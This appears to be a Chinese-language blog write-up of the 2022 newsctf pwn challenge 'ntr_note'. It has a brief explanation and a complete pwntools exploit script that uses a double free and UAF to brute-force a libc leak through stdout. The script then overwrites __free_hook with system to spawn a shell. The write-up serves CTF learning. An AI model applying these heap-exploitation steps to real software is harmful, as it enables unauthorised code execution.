---
title: 2022 newsctf pwn 复现
date: 2022-03-30 23:54:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=7/
pin: false
published:
---
## ntr_note(堆stdout爆破泄露libc+uaf)

没有show，很多put，考虑控制stdout来泄露stdin地址获取libc基址，要么爆破，要么算偏移，爆破的话只有后三位，需要一个基址，unsortbin可以泄露，add有大小限制造不了chunk，有doublefree那就改大小，泄露了怎么申请到呢，切割unsortbinchunk。
总结：学到很多，IO_file leak的技巧，IO相关的知识，double free的用法，UAF的用法，爆破的技巧
参考资料：https://www.jianshu.com/p/27152c14e2e7

```python
# -*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import *
# context.update(os='linux',arch='amd64',log_level='debug')

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

libc = ELF('./libc-2.31.so')

def dbg():
	gdb.attach(p)
	pause()

def cmd(ch):
	sla('>>', ch)	

def add(size,content):
	cmd(1)
	sla('size:', size)
	sa('content:', content)

def free(index):
	cmd(2)
	sla('idx:', index)

def edit(index,content):
	cmd(4)
	sla('idx:', index)
	sa('content:', content)

i = 1
while i:
	try:
		p = process('ntr_note')
		#p = remote('81.68.86.115',10000)
		# double free
		add(0x38,'aaa')#0
		add(0x50,'aaa')#1
		add(0x50,'aaa')#2
		add(0x50,'aaa')#3
		free(2)
		free(3)
		free(0)
		edit(0,'a'*0x10)
		free(0)

		# change size
		edit(0,'\xd0')
		add(0x30,'aaa')#4
		add(0x30,'a'*0x8+p64(0xc1))#5  

		# fill tcache
		for i in range(7):
			free(1)
			edit(5,p64(0)+p64(0xc1)+p64(0)*2)
		free(1)

		# make addr
		add(0x10,p16(0xa6a0))#6

		# Empty shell
		free(0)
		edit(0,p64(0)*2)
		free(0)
		edit(0,p64(0)*2)
		free(0)
		edit(0, '\xe0')

		# IO_file leak
		add(0x30, 'a')#7
		add(0x38, 'a')#8
		leak = p64(0xfbad1800)+p64(0)*3+'\x00'
		add(0x38, leak)#9
		libc_base = u64(p.recvuntil('\x7f',timeout=0.1)[-6:].ljust(8,'\x00'))-libc.sym['_IO_2_1_stdin_']# 0.1s
		if (libc_base<0):
			p.close()
			continue
		lg('libc_base',libc_base)
		sym = libc.sym['system'] + libc_base
		free_hook = libc.sym['__free_hook'] + libc_base

		add(0x20,'/bin/sh\x00')#10
		free(10)
		edit(10,p64(0)*2)
		free(10)
		dbg()
		edit(10,p64(free_hook))
		dbg()
		add(0x20,'/bin/sh\x00')#11
		add(0x20,p64(sym))
		free(11)
		p.interactive()
		break		
	except EOFError:
		p.close()
		continue
```